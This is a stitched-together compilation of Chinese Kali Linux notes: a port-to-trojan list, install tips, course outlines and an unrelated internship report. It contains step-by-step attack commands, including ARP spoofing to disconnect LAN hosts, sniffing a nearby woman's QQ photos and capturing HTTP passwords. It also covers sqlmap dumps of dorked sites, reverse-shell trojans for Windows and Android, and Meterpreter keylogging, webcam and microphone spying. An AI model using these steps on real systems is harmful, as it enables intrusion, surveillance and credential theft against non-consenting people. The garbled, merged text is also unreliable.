许可证管理端⼝1387端⼝：系统开放端⼝(rundll32.exe)1388端⼝：数据库⾼速缓存端⼝1389端⼝：⽂档管理端⼝1390端⼝：存储控制器端⼝1391端⼝：存储器存取服务器端⼝1392端⼝：打印管理端⼝1393端⼝：⽹络登陆服务器端⼝1394端⼝：⽹络登陆客户端端⼝1395端⼝：PC⼯作站管理软件端⼝1396端⼝：DVL活跃邮件端⼝1397端⼝：⾳频活跃邮件端⼝1398端⼝：视频活跃邮件端⼝1433端⼝：Microsoft的SQL服务开放端⼝1434端⼝：Microsoft的SQL服务监视端⼝1492端⼝：⽊马FTP99CMP开放此端⼝1509端⼝：⽊马Psyber Streaming Server开放此端⼝1512端⼝：Microsoft Windows⽹络名称服务1524端⼝：许多攻击脚本安装⼀个后门SHELL于这个端⼝1600端⼝：⽊马Shivka-Burka开放此端⼝1645端⼝：远程认证拨号⽤户服务1701端⼝：第2层隧道协议1731端⼝：NetMeeting⾳频调⽤控制1801端⼝：Microsoft消息队列服务器1807端⼝：⽊马SpySender开放此端⼝1900端⼝：可被利⽤ddos攻击，⼀般关闭1912端⼝：⾦⼭词霸开放此端⼝1981端⼝：⽊马ShockRave开放此端⼝1999端⼝：⽊马BackDoor,yai开放此端⼝2000端⼝：⽊马GirlFriend 1.3、Millenium 1.0开放此端⼝2001端⼝：⽊马Millenium 1.0、Trojan Cow,⿊洞2001开放此端⼝2003端⼝：GNU 查询2023端⼝：⽊马Pass Ripper开放此端⼝2049端⼝：NFS程序常运⾏于此端⼝2115端⼝：⽊马Bugs开放此端⼝2140端⼝：⽊马Deep Throat 1.0/3.0，The Invasor开放此端⼝2500端⼝：应⽤固定端⼝会话复制的RPC客户2504端⼝：⽹络平衡负荷2565端⼝：⽊马Striker开放此端⼝2583端⼝：⽊马Wincrash 2.0开放此端⼝2801端⼝：⽊马Phineas Phucker开放此端⼝2847端⼝：诺顿反病毒服务开放此端⼝3024端⼝：⽊马WinCrash开放此端⼝3128端⼝：squid http代理服务器开放此端⼝3129端⼝：⽊马Master Paradise开放此端⼝3150端⼝：⽊马The Invasor,deep throat开放此端⼝3210端⼝：⽊马SchoolBus开放此端⼝3306端⼝：MySQL开放此端⼝3333端⼝：⽊马Prosiak开放此端⼝3389端⼝：WINDOWS 2000终端开放此端⼝3456端⼝：inetinfo.exe(互联⽹信息服务)开放端⼝，VAT默认数据3457端⼝：VAT默认控制3527端⼝：Microsoft消息队列服务器3700端⼝：⽊马Portal of Doom开放此端⼝3996端⼝：⽊马RemoteAnything开放此端⼝4000端⼝：腾讯QQ客户端开放此端⼝4060端⼝：⽊马RemoteAnything开放此端⼝4092端⼝：⽊马WinCrash开放此端⼝4133端⼝：NUTS Bootp服务器4134端⼝：NIFTY-Serve HMI协议4141端⼝：Workflow服务器4142端⼝：⽂档服务器4143端⼝：⽂档复制4145端⼝：VVR控制4321端⼝：远程Who Is查询4333端⼝：微型sql服务器4349端⼝：⽂件系统端⼝记录4350端⼝：⽹络设备4351端⼝：PLCY⽹络服务4453端⼝：NSS警报管理4454端⼝：NSS代理管理4455端⼝：PR聊天⽤户4456端⼝：PR聊天服务器4457端⼝：PR注册4480端⼝：Proxy+ HTTP代理端⼝4500端⼝：Lsass开放端⼝，不能关闭4547端⼝：Lanner许可管理4555端⼝：RSIP端⼝4590端⼝：⽊马ICQTrojan开放此端⼝4672端⼝：远程⽂件访问服务器4752端⼝：简单⽹络⾳频服务器4800端⼝：Icona快速消息系统4801端⼝：Icona⽹络聊天4802端⼝：Icona许可系统服务器4848端⼝：App服务器-Admin HTTP4849端⼝：App服务器-Admin HTTPS4950端⼝：⽊马IcqTrojan开放5000端⼝5000端⼝：⽊马blazer5，Sockets de Troie开放5000端⼝，⼀般应关闭5001端⼝：⽊马Sockets de Troie开放5001端⼝5006端⼝：wsm服务器5007端⼝：wsm服务器ssl5022端⼝：mice服务器5050端⼝：多媒体会议控制协议5051端⼝：ITA代理5052端⼝：ITA管理5137端⼝：MyCTS服务器端⼝5150端⼝：Ascend通道管理协议5154端⼝：BZFlag游戏服务器5190端⼝：America-Online(美国在线)5191端⼝：AmericaOnline1(美国在线)5192端⼝：AmericaOnline2(美国在线)5193端⼝：AmericaOnline3(美国在线)5222端⼝：Jabber客户端连接5225端⼝：HP(惠普公司)服务器5226端⼝：HP(惠普公司)5232端⼝：SGI绘图软件端⼝5250端⼝：i⽹关5264端⼝：3Com⽹络端⼝15265端⼝：3Com⽹络端⼝25269端⼝：Jabber服务器连接5306端⼝：Sun MC组5321端⼝：⽊马Sockets de Troie开放5321端⼝5400端⼝：⽊马Blade Runner开放此端⼝5401端⼝：⽊马Blade Runner开放此端⼝5402端⼝：⽊马Blade Runner开放此端⼝5405端⼝：⽹络⽀持5409端⼝：Salient数据服务器5410端⼝：Salient⽤户管理5415端⼝：NS服务器5416端⼝：SNS⽹关5417端⼝：SNS代理5421端⼝：⽹络⽀持25423端⼝：虚拟⽤户5427端⼝：SCO-PEER-TTA(Unix系统)5432端⼝：PostgreSQL数据库5550端⼝：⽊马xtcp开放此端⼝5569端⼝：⽊马Robo-Hack开放此端⼝5599端⼝：公司远程安全安装5600端⼝：公司安全管理5601端⼝：公司安全代理5631端⼝：pcANYWHERE(软件)数据5632端⼝：pcANYWHERE(软件)数据5673端⼝：JACL消息服务器5675端⼝：V5UA应⽤端⼝5676端⼝：RA管理5678端⼝：远程复制代理连接5679端⼝：直接电缆连接5720端⼝：MS-执照5729端⼝：Openmail⽤户代理层5730端⼝：Steltor's⽇历访问5731端⼝：netscape(⽹景)suiteware5732端⼝：netscape(⽹景)suiteware5742端⼝：⽊马WinCrash1.03开放此端⼝5745端⼝：fcopy-服务器5746端⼝：fcopys-服务器5755端⼝：OpenMail(邮件服务器)桌⾯⽹关服务器5757端⼝：OpenMail(邮件服务器)X.500⽬录服务器5766端⼝：OpenMail (邮件服务器)NewMail服务器5767端⼝：OpenMail (邮件服务器)请求代理曾(安全) 5768端⼝：OpenMail(邮件服务器) CMTS服务器5777端⼝：DALI端⼝5800端⼝：虚拟⽹络计算5801端⼝：虚拟⽹络计算5802端⼝：虚拟⽹络计算HTTP访问, d5803端⼝：虚拟⽹络计算HTTP访问, d5900端⼝：虚拟⽹络计算机显⽰05901端⼝：虚拟⽹络计算机显⽰15902端⼝：虚拟⽹络计算机显⽰25903端⼝：虚拟⽹络计算机显⽰36000端⼝：X Window 系统6001端⼝：X Window 服务器6002端⼝：X Window 服务器6003端⼝：X Window 服务器6004端⼝：X Window 服务器6005端⼝：X Window 服务器6006端⼝：X Window 服务器6007端⼝：X Window 服务器6008端⼝：X Window 服务器6009端⼝：X Window 服务器6456端⼝：SKIP证书发送6471端⼝：LVision许可管理器6505端⼝：BoKS管理私⼈端⼝6506端⼝：BoKS管理公共端⼝6507端⼝：BoKS Dir服务器,私⼈端⼝6508端⼝：BoKS Dir服务器,公共端⼝6509端⼝：MGCS-MFP端⼝6510端⼝：MCER端⼝6566端⼝：SANE控制端⼝6580端⼝：Parsec主服务器6581端⼝：Parsec对等⽹络6582端⼝：Parsec游戏服务器6588端⼝：AnalogX HTTP代理端⼝6631端⼝：Mitchell电信主机6667端⼝：Internet多线交谈6668端⼝：Internet多线交谈6670端⼝：⽊马Deep Throat开放此端⼝6671端⼝：⽊马Deep Throat 3.0开放此端⼝6699端⼝：Napster⽂件(MP3)共享服务6701端⼝：KTI/ICAD名称服务器6788端⼝：SMC软件-HTTP6789端⼝：SMC软件-HTTPS6841端⼝：Netmo软件默认开放端⼝6842端⼝：Netmo HTTP服务6883端⼝：⽊马DeltaSource开放此端⼝6939端⼝：⽊马Indoctrination开放此端⼝6969端⼝：⽊马Gatecrasher、Priority开放此端⼝6970端⼝：real⾳频开放此端⼝7000端⼝：⽊马Remote Grab开放此端⼝7002端⼝：使⽤者& 组数据库7003端⼝：⾳量定位数据库7004端⼝：AFS/Kerberos认证服务7005端⼝：⾳量管理服务7006端⼝：错误解释服务7007端⼝：Basic监督进程7008端⼝：服务器-服务器更新程序7009端⼝：远程缓存管理服务7011端⼝：Talon软件发现端⼝7012端⼝：Talon软件引擎7013端⼝：Microtalon发现7014端⼝：Microtalon通信7015端⼝：Talon⽹络服务器7020端⼝：DP服务7021端⼝：DP服务管理7100端⼝：X字型服务7121端⼝：虚拟原型许可证管理7300端⼝：⽊马NetMonitor开放此端⼝7301端⼝：⽊马NetMonitor开放此端⼝7306端⼝：⽊马NetMonitor，NetSpy1.0开放此端⼝7307端⼝：⽊马NetMonitor开放此端⼝7308端⼝：⽊马NetMonitor开放此端⼝7323端⼝：Sygate服务器端7511端⼝：⽊马聪明基因开放此端⼝7588端⼝：Sun许可证管理7597端⼝：⽊马Quaz开放此端⼝7626端⼝：⽊马冰河开放此端⼝7633端⼝：PMDF管理7674端⼝：iMQ SSL通道7675端⼝：iMQ通道7676端⼝：⽊马Giscier开放此端⼝7720端⼝：Med图象⼊⼝7743端⼝：Sakura脚本传递协议7789端⼝：⽊马ICKiller开放此端⼝7797端⼝：Propel连接器端⼝7798端⼝：Propel编码器端⼝8000端⼝：腾讯QQ服务器端开放此端⼝8001端⼝：VCOM通道8007端⼝：Apache(类似iis)jServ协议1.x8008端⼝：HTTP Alternate8009端⼝：Apache(类似iis)JServ协议1.38010端⼝：Wingate代理开放此端⼝8011端⼝：⽊马way2.4开放此端⼝8022端⼝：OA-系统8080端⼝：WWW代理开放此端⼝8081端⼝：ICECap控制台8082端⼝：BlackIce(防⽌⿊客软件)警报发送到此端⼝8118端⼝：Privoxy HTTP代理8121端⼝：Apollo数据端⼝8122端⼝：Apollo软件管理端⼝8181端⼝：Imail8225端⼝：⽊马灰鸽⼦开放此端⼝8311端⼝：⽊马初恋情⼈开放此端⼝8351端⼝：服务器寻找8416端⼝：eSpeech Session协议8417端⼝：eSpeech RTP协议8473端⼝：虚拟点对点8668端⼝：⽹络地址转换8786端⼝：Message客户端8787端⼝：Message服务器8954端⼝：Cumulus管理端⼝9000端⼝：CS监听9001端⼝：ETL服务管理9002端⼝：动态id验证9021端⼝：Pangolin验证9022端⼝：PrivateArk远程代理9023端⼝：安全⽹络登陆-19024端⼝：安全⽹络登陆-29025端⼝：安全⽹络登陆-39026端⼝：安全⽹络登陆-49101端⼝：Bacula控制器9102端⼝：Bacula⽂件后台9103端⼝：Bacula存储邮件后台9111端⼝：DragonIDS控制台9217端⼝：FSC通讯端⼝9281端⼝：软件传送端⼝19282端⼝：软件传送端⼝29346端⼝：C技术监听9400端⼝：⽊马Incommand 1.0开放此端⼝9401端⼝：⽊马Incommand 1.0开放此端⼝9402端⼝：⽊马Incommand 1.0开放此端⼝9594端⼝：信息系统9595端⼝：Ping Discovery服务9800端⼝：WebDav源端⼝9801端⼝：Sakura脚本转移协议-29802端⼝：WebDAV Source TLS/SSL 9872端⼝：⽊马Portal of Doom开放此端⼝9873端⼝：⽊马Portal of Doom开放此端⼝9874端⼝：⽊马Portal of Doom开放此端⼝9875端⼝：⽊马Portal of Doom开放此端⼝9899端⼝：⽊马InIkiller开放此端⼝9909端⼝：域名时间9911端⼝：SYPECom传送协议9989端⼝：⽊马iNi-Killer开放此端⼝9990端⼝：OSM Applet程序服务器9991端⼝：OSM事件服务器10000端⼝：⽹络数据管理协议10001端⼝：SCP构造端⼝10005端⼝：安全远程登陆10008端⼝：Octopus多路器10067端⼝：⽊马iNi-Killer开放此端⼝10113端⼝：NetIQ端点10115端⼝：NetIQ端点10116端⼝：NetIQVoIP鉴定器10167端⼝：⽊马iNi-Killer开放此端⼝11000端⼝：⽊马SennaSpy开放此端⼝11113端⼝：⾦⼭词霸开放此端⼝11233端⼝：⽊马Progenic trojan开放此端⼝12076端⼝：⽊马Telecommando开放此端⼝12223端⼝：⽊马Hack'99 KeyLogger开放此端⼝12345端⼝：⽊马NetBus1.60/1.70、GabanBus开放此端⼝12346端⼝：⽊马NetBus1.60/1.70、GabanBus开放此端⼝12361端⼝：⽊马Whack-a-mole开放此端⼝13223端⼝：PowWow 客户端，是Tribal Voice的聊天程序13224端⼝：PowWow 服务器，是Tribal Voice的聊天程序16959端⼝：⽊马Subseven开放此端⼝16969端⼝：⽊马Priority开放此端⼝17027端⼝：外向连接19191端⼝：⽊马蓝⾊⽕焰开放此端⼝20000端⼝：⽊马Millennium开放此端⼝20001端⼝：⽊马Millennium开放此端⼝20034端⼝：⽊马NetBus Pro开放此端⼝21554端⼝：⽊马GirlFriend开放此端⼝22222端⼝：⽊马Prosiak开放此端⼝23444端⼝：⽊马⽹络公⽜开放此端⼝23456端⼝：⽊马Evil FTP、Ugly FTP开放此端⼝25793端⼝：Vocaltec地址服务器26262端⼝：K3软件-服务器26263端⼝：K3软件客户端26274端⼝：⽊马Delta开放此端⼝27374端⼝：⽊马Subseven 2.1开放此端⼝30100端⼝：⽊马NetSphere开放此端⼝30129端⼝：⽊马Masters Paradise开放此端⼝30303端⼝：⽊马Socket23开放此端⼝30999端⼝：⽊马Kuang开放此端⼝31337端⼝：⽊马BO(Back Orifice)开放此端⼝31338端⼝：⽊马BO(Back Orifice)，DeepBO开放此端⼝31339端⼝：⽊马NetSpy DK开放此端⼝31666端⼝：⽊马BOWhack开放此端⼝31789端⼝：Hack-a-tack32770端⼝：sun solaris RPC服务开放此端⼝33333端⼝：⽊马Prosiak开放此端⼝33434端⼝：路由跟踪34324端⼝：⽊马Tiny Telnet Server、BigGluck、TN开放此端⼝36865端⼝：KastenX软件端⼝38201端⼝：Galaxy7软件数据通道39681端⼝：TurboNote默认端⼝40412端⼝：⽊马The Spy开放此端⼝40421端⼝：⽊马Masters Paradise开放此端⼝40422端⼝：⽊马Masters Paradise开放此端⼝40423端⼝：⽊马Masters Paradise开放此端⼝40426端⼝：⽊马Masters Paradise开放此端⼝40843端⼝：CSCC 防⽕墙43210端⼝：⽊马SchoolBus 1.0/2.0开放此端⼝43190端⼝：IP-PROVISION44321端⼝：PCP服务器(pmcd)44322端⼝：PCP服务器(pmcd)代理44334端⼝：微型个⼈防⽕墙端⼝44442端⼝：ColdFusion软件端⼝44443端⼝：ColdFusion软件端⼝44445端⼝：⽊马Happypig开放此端⼝45576端⼝：E代时光专业代理开放此端⼝47262端⼝：⽊马Delta开放此端⼝47624端⼝：Direct Play服务器47806端⼝：ALC协议48003端⼝：Nimbus⽹关50505端⼝：⽊马Sockets de Troie开放此端⼝50766端⼝：⽊马Fore开放此端⼝53001端⼝：⽊马Remote Windows Shutdown开放此端⼝54320端⼝：⽊马bo2000开放此端⼝54321端⼝：⽊马SchoolBus 1.0/2.0开放此端⼝61466端⼝：⽊马Telecommando开放此端⼝65000端⼝：⽊马Devil 1.03开放此端⼝65301端⼝：PC Anywhere软件开放端⼝。

1.软件更新apt-get upgrademetasploit.service: Unit metasploit.service failed to load: No such file or directory. 是因为在kali 2.0 已经没有metasploit 这个服务了，所以service metasploit start 的方式不起作用。

在kali 2.0中启动带数据库支持的MSF方式如下：#1 首先启动postgresql数据库：/etc/init.d/postgresql start；或者service postgresql start；#2 初始化MSF数据库（关键步骤！）：msfdb init；#3 运行msfconsole（下一次在使用的时候直接输这个就好了）#4 在msf中查看数据库连接状态：db_status。

3.arpspoof(局域网里的ip断网)Interface 网络接口target 目标Iparpspoof -i 网卡-t 目标ip 网关ifconfig查看自己的Ip 网卡等信息Fping-asg 192.168.1.0/24查看自己局域网内的ip4.msf更新exec: svn update5.There is considerable lagging connection response 有延迟6.Sqlmap 注入试用：sqlmap -u 网址--dbs --current -user查看网站7.Inurl:asp?Id= 谷歌查sql注入漏洞inurl:T eachView.asp 同之前Sqlmap -u 网址--tables拆解Sqlmap -u 网址-T 加表名--columnsSqlmap -u 网址-T 加表名-C 加拆解出来的--dump。

Kali基础知识Kali Linux是一款专门用于渗透测试，网络安全和数字取证的开源操作系统。

Kali Linux集成了众多安全测试工具，并且针对渗透测试和安全研究进行了优化和定制，使得这些工具更加强大和易于使用。

Kali Linux是一个非常重要的工具，可以用于测试和评估网络和信息系统的安全性，并发现其中的漏洞和弱点。

下面是Kali Linux的基础知识。

Kali Linux的历史背景Kali Linux这个名字来源于印度教神话中的“卡利”。

2012年，Kali Linux正式推出，取代了之前的BackTrack。

Kali Linux的开发是由Offensive Security公司进行的，其初衷是为了让网络安全专业人员更容易地进行渗透测试和安全审计等工作。

Kali Linux的开发人员秉承了开源理念，将其发布为自由软件。

Kali Linux的安装Kali Linux可以作为主操作系统安装，也可以通过虚拟机等方式运行。

对于初学者，最好的方法是通过虚拟机安装Kali Linux。

虚拟机可以在你的现有操作系统上运行，并允许你创建一个虚拟计算机。

这样，你可以在同一台电脑上运行多个操作系统，而无需在硬盘上安装一些新的操作系统。

要安装Kali Linux，请首先下载VMware或VirtualBox虚拟机软件，随后下载Kali Linux ISO文件。

你可以使用虚拟机软件将ISO文件导入虚拟计算机，然后安装Kali Linux。

Kali Linux的使用Kali Linux的主要功能是提供渗透测试工具。

虽然它也像其他Linux发行版一样提供基本的命令行功能，但Kali主要集中在网络安全方面。

这些工具可以帮助你发现和评估网络和计算机系统中存在的漏洞和安全弱点。

对于初学者，建议从基本命令行工具开始。

其中最基本的命令是“ls”（列出当前目录的文件列表），“cd”（进入一个目录）和“mkdir”（创建一个新目录）。

Kali linux笔记Vnc客户端安装：apt-get install vnc4server使用：vncserver运行，设置密码（保证在同一网段）Kali系统的更新Leafpad /etc/apt/sources.list 打开这个记事本，并复制更新源地址到这里然后保存。

执行：apt-get updateapt-get dist-upgrade安装Flash这件事情相当简单、容易，对大多数人来说应该没有问题：在终端中，键入这个命令：1.apt-get install flashplugin-nonfree然后键入：1.update-flashplugin-nonfree - -install就是这样。

你的flash现在应该能够正常工作了。

Kde美化Apt-get install kde-full局域网断网攻击Arpspoof –i 网卡–t 目标ip 网关例：arpspoof –i eht0 –t 192.168.1.100 192.168.1.1怎么看局域网当中的ip呢？Fping –asg 192.168.1.0/24实战-获取内网妹子的QQ相册arpspoof –I eht0 –t 192.168.1.1 192.168.1.100 欺骗100主机driftnet 获取本机网卡浏览过的图片“目标>我的网卡>网关driftnet –i eth0此时echo命令，它不会有回显HTTP帐号和密码获取第一步：欺骗目标arpspoof –I eht0 –t 192.168.100 192.168.1.1ettercap –Tq –i eth0MeasploitMsfconsole 启动msfconsole的命令行模式1、Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.62 LPORT=4444 X > test.exe生成远程文件2、Msfconsole这个标签里use exploit/multi/handler 使用handler这个模块set PAYLOAD windows/meterpreter/reverse_tcp使用这个shelllcadeshow options 查看set LHOST 192.168.1.62set LPORT 4444exploit 运行sysinfo 查看系统版本怎么使用木马?Background 把会话放到后台Sessions 查看有哪些会话Sessions –I 1 切换会话注入进程：木马随时有可能被结束掉的Ps 查看我们要注入的进程Migrate xxx(进程ID) 注入run vnc 远程桌面开启文件管理功能Download 下载文件edit 编辑文件Upload 上传文件木马的系统操作功能Arp 看arp缓冲表Ifconfig ip地址网卡Getproxy 获取代理Netstat 查看端口链接Kill 结束进程Ps 查看进程Reg 注册表Shell 获取shell木马的用户操作及摄像头操作Enumdesktops ：查看用户登录数量keyscan_dump ：查看键盘记录keyscan_start ：记录开始webcam_chat ：记录结束uictl 获取键盘鼠标控制权record_mic 声音录制webcam_chat 查看摄像头接口webcam_list 查看摄像头列表webcam_snapwebcam_stream 开启摄像头getsystem 获取高权限metasploit之渗透安卓实战msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.203 LPROT=3333 R > muma.apk 生成木马架设模版：use exploit/multi/handlerSet PAYLOAD android/meterpreter/reverse_tcp。

第18章Metasploit Framework142.渗透测试者的困扰.exe143.Metasploit简介、教材和版本对比.exemetasploit framework 是一个框架，渗透测试各个阶段的工具基本都具备，同时有灵活扩展的功能。

ruby语言开发最大的软件就是metasploit。

HD More参与了shodan项目。

nessus openvas扫描出来的漏洞不一定真的存在，使用msf验证漏洞。

msf集成到kali，更新kali同时会更新msf。

已购买中文第二版。

第一个是集成在kali中的版本。

基于web的免费版在大批量工作时会有限制。

收费版的报告功能很强大。

144.Metasploit Framework 和MSF架构.exe数据库默认端口5432，有异常时msf 启动会提示数据库连接失败。

在不启动数据库情况下命令行输入msfconsole 会提示连接数据库失败。

但是在不启动数据库点击桌面msf 图标的时候会自动启动数据库。

145.MSF架构-技术功能模块.exels /usr/share/metasploit-framework/modules/exploits/windows/smb/POC/EXP是漏洞利用方法代码，可以调用payload或者shellcode，而没有shellcode/payload 功能。

payload跟漏洞没有关系，漏洞怎么产生的，怎么利用的都没有关系。

获得shell的代码是shellcode，也可以只执行一条命令。

auxiliary里有包含DoS的模块，让目标崩溃的模块。

不包含payload功能。

还有post模块，后攻击阶段的模块。

146.MSF基本使用和控制台命令.exe在msf下也可以执行部分系统命令。

help vulns-q静默方式启动，-r 资源文件，-v 当前版本connect 是msf下的类似于nc的工具。

支持代理，支持ssl加密。

【Linux】Kali物理机安装笔记、简单过程及注意事项Kali 安装笔记今天得到了⼀块新的固态硬盘，在物理机上安装了⼀次 Kali ，总结⼀下安装⼼得；安装环境：电脑型号⼩⽶ Pro备注运⾏内存8G固态存储256GCPU x86普普通通的CPU安装过程由于是单硬盘安装，只要不断 > 下⼀步 > 下⼀步 就好，在这⾥说⼏个注意事项；检查⽹络硬件的时候，需要⼀个路由器 + ⼀根⽹线，这样可以让电脑⾃动获取 IP ，如果检测失败，拔插⽹线再来⼀遍；安装硬盘我选的是 > 整个硬盘，然后就会⾃动安装，你可以⾃⼰考虑；引导，如果是两个硬盘的话，那么就有两种情况：引导放在 Linux 固态上，那么就是 F12 进⼊系统选择；引导放在 Windows 引导下，可能会导致引导出错，导致后期⾃⼰搭引导，当然也可能成功；grub 问题在但固态情况下未遇到；最后选择应⽤的时候，取消了最下⽅的⼀个勾选，否则会报错，原因不明；安装好第⼀件事先给root⽤户更改密码，登录root⽤户，换源更新，换源步骤如下；有⼀个⼩问题，安装 VSCode 之后⽆法安装插件，原来是给的权限不够，遇到相同问题的⼩伙伴去百度吧，⽹上挺多的；换源使⽤vim打开/etc/apt/sources.list ⽂件，注解内部未注解的代码⾏，并且粘贴进新的源链接；执⾏命令apt-get update；执⾏命令apt-get upgrade；遇到的问题：居然没有⾃带 vim，很奇怪，所以先使⽤：apt-get install leafpad 命令，下载安装 leafpad；使⽤ leafpad 代替 vim ，从第⼀⾏向下执⾏；依赖错误，使⽤命令apt -f install解决，解决后重新执⾏依赖报错的命令；更改密码不同于 Windows ，Linux 激活的时候⽤的并不是管理员，⽽是普通⽤户，我们需要通过普通⽤户更改管理员的密码，过程如下：登录普通⽤户，打开终端输⼊命令passwd root；输⼊普通⽤户的登录密码；输⼊两次你想给管理员的密码；更改成功，退出登录，重新登录；账号是root，密码是刚刚输⼊的密码；给系统更换语⾔由于暗转的过程⽐较简单，所以我直接选择了英⽂安装，然后更改成中⽂，保留Downloads、Desktop、Documents 等⽂件夹；较为简单，需要执⾏的同学请看如；步骤细分先准备启动盘，使⽤的软件是 Deepin ，在接下来更新系统的时候会将资源写进去；换固态、装系统、⼀直下⼀步、解决问题、开机、给 root ⽤户设置密码、登录 root；换源；更换系统语⾔为中⽂；安装搜狗输⼊法；关于⼯具选择办公：摒弃了 Windows 的 Office 全家桶，换成了 WPS for Linux 版本；编程：毫⽆变化，最近准备学习⼀下 Eclipse 的使⽤（课程需要）；聊天：⽬前还没找到合适的替代品，不出意外的话，最近两天应该会尝试移植 wine 版本的 QQ / 微信；上⽹： FireFox / Chrome ，⼀直以来我的不⼆之选；⽹盘：百度⽹盘 for Linux；⾳乐：⽹易云⾳乐 for Linux；上⽹：⼩飞机 for Linux⽬前这些软件已经包括我使⽤的了，但是还没有 PS / Pr 等软件（其实 Deepin 是有⼀个叫 Gxxx 的软件来代替 PS 的）不考虑移植，因为那个软件我⽤着很不习惯；另外在Windows 上我⼀直有使⽤ WallpaperEngine ，在 Linux 上没有绚丽的动态壁纸，但是好在我有⼏个壁纸⽹站的永久会员，还有⼀些免费的壁纸软件可以选择，所以这⼀点倒不是⼗分必要；我使⽤的 Kali 源deb /kali kali-rolling main non-free contribdeb-src /kali kali-rolling main non-free contrib总结这⼀篇博客就是在 Kali 实体机上写的，之前在 Windows 上使⽤的是 Typroa 来写 MarkDown，现在使⽤的是 VSCode 。

学习使用KaliLinux进行网络渗透测试Kali Linux是一款广泛使用的操作系统，特别适用于网络渗透测试。

它集成了各种渗透测试工具，提供了一个功能强大且灵活的平台，用于评估网络的安全性。

本文将介绍学习使用Kali Linux 进行网络渗透测试的步骤，并分为以下几个章节详细讨论。

第一章：Kali Linux简介- 介绍Kali Linux的背景和发展，以及为什么选择使用它进行渗透测试。

- 解释Kali Linux的特点和功能，如预装的渗透测试工具和易于使用的界面。

第二章：安装Kali Linux- 介绍Kali Linux的安装过程，包括下载Kali Linux ISO镜像和创建启动盘。

- 指导读者在虚拟机或实际硬件上安装Kali Linux。

- 提供一些建议和技巧，帮助读者避免常见的安装问题。

第三章：Kali Linux基础知识- 介绍Kali Linux的基本命令和操作，例如文件管理、软件包管理和网络配置。

- 解释如何使用终端窗口和命令行工具来执行基本任务，如创建目录、复制文件和安装软件包。

第四章：网络渗透测试案例- 提供一个实际的网络渗透测试案例，并指导读者如何使用Kali Linux工具来执行测试。

- 包括信息收集、漏洞扫描、远程攻击和渗透测试报告的生成。

- 强调案例中使用的每个工具的功能和用途。

第五章：网络渗透测试实用技巧- 分享一些实用技巧和技术，帮助读者更有效地使用Kali Linux进行网络渗透测试。

- 包括如何扫描和发现隐藏服务、如何使用社会工程学和钓鱼攻击来获取访问权限，以及如何保护自己免受检测和追踪。

第六章：Kali Linux社区和资源- 介绍Kali Linux官方网站和社区资源，如论坛、博客和在线培训。

- 提供一些有用的网址和资源，读者可以进一步学习和深入了解网络渗透测试。

结论：本文详细介绍了学习使用Kali Linux进行网络渗透测试的步骤和技巧，包括安装Kali Linux、掌握基本知识、实践案例和使用实用技巧。

kali linux基本命令摘要：1.引言2.Kali Linux简介3.Kali Linux基本命令概述4.网络扫描命令5.漏洞扫描与渗透测试命令6.系统安全与取证命令7.无线网络攻击与嗅探命令8.密码破解命令9.后渗透测试与维持访问命令10.结语正文：【引言】Kali Linux是一款面向网络安全专业人士的Linux发行版，它集成了大量用于渗透测试、安全审计和其他网络安全相关任务的开源工具。

熟悉并掌握Kali Linux的基本命令对于从事网络安全工作的人来说非常关键。

本文将详细介绍Kali Linux的基本命令。

【Kali Linux简介】Kali Linux是基于Debian的Linux发行版，由Offensive Security Ltd 开发。

它包括大量的预装工具，涵盖了网络扫描、漏洞检测、渗透测试、系统取证、无线网络攻击等各个方面，为网络安全专业人士提供了强大的工具支持。

【Kali Linux基本命令概述】Kali Linux的基本命令主要可以分为以下几类：网络扫描命令、漏洞扫描与渗透测试命令、系统安全与取证命令、无线网络攻击与嗅探命令、密码破解命令、后渗透测试与维持访问命令。

【网络扫描命令】网络扫描命令主要包括Nmap、Nessus和OpenVAS等工具，用于探测目标主机的开放端口、服务、操作系统等信息。

【漏洞扫描与渗透测试命令】漏洞扫描与渗透测试命令包括Metasploit、Nikto、OpenVAS等，用于发现目标主机的潜在漏洞并尝试进行渗透测试。

【系统安全与取证命令】系统安全与取证命令包括Aircrack-ng、John the Ripper、Wireshark 等，用于进行无线网络攻击、密码破解以及网络流量分析等。

【无线网络攻击与嗅探命令】无线网络攻击与嗅探命令包括Aircrack-ng、Kismet、Reaver等，用于攻击无线网络并获取数据包。

【密码破解命令】密码破解命令包括John the Ripper、Hashcat等，用于破解加密后的密码。

实习报告——嵌入式linux培训7.161．虚拟机文件系统目录介绍：/bin:系统可执行文件存放目录/lib:系统库文件存放目录，动态链接库以后缀名.so的形式存在；/usr:/include；头文件存放目录/home:Linux系统用户主目录的存放位置/opt：用户搭建的一些环境的一般存放位置/tftpboot:tftp服务器的工作目录. 当前目录..上一级目录~ 当前用户的主目录2.命令介绍：cd：切换目录(是cd xike而不是cd /xike)pwd：显示当前目录的绝对路径绝对路径：从根目录开始的路径相对路径：从一个非根目录开始的路径Ls:以一定的选项显示指定目录的内容，如果没有指定路径默认显示当前的内容；-a：显示包括隐藏内容在内的所有内容，linux下以.开始的名称属于隐藏内容；-l:以列表的形式显示内容的详细信息-d：显示目录本身的信息，一般与l连用；（如果直接输入-d命令，则只会显示一个.表示当前文件名，若输入ld，则才会显示详细信息）Clear：使命令提示符围绕终端界面的最上端Man:linux的帮助手册（进去后按Q键返回）Mkdir:创建目录，后跟目录名（名称或路径）Rmdir:删除一个空目录Touch：创建一个空文件（touch dir_test/file）cp：复制文件或目录（cp note dir_test,将这个文件复制到dir_test）（cp note dir_test/b,复制到dir_test的b文件夹）-r:递归遍历目录下的所有内容，并复制Mv:改名或移动（mv dir d）Rm:删除目录-r：用于删除目录-f：忽略任何提示-i：提示是否删除（sudo rm –rf/这行命令是全部删除，无法恢复，千万别轻易输入）vi:文本编辑器命令模式——按a或i或o进入到插入模式——输入hello word ——ESC退出编辑模式（即返回命令模式）——输入：冒号指令会跳至最后一行，输入wq+文件名（保存功能）——输入vi hello.c——就可编辑代码（也可查看该文件已写内容）gcc+源文件名就可编译一个可执行文件.out；./a.out:执行当前目录下的可执行文件；今天主要介绍了以上的内容，通过老师的讲解，我逐渐了解到虚拟机的用法和ubuntu操作系统的强大，之前没有接触过，感觉还是有兴趣慢慢学下去的。

kali常用命令实训总结在网络安全领域，Kali Linux是一个非常受欢迎的渗透测试和安全审计的操作系统。

它提供了许多强大的工具和命令，帮助安全专业人员发现和解决系统中的漏洞和安全漏洞。

在进行Kali Linux实训的过程中，我学习和掌握了一些常用命令，以下是我的总结：1. apt-get更新与安装软件：在Kali Linux中，apt-get命令用于更新操作系统和安装软件包。

使用"apt-get update"命令可以更新软件源列表，以获取最新的软件包信息。

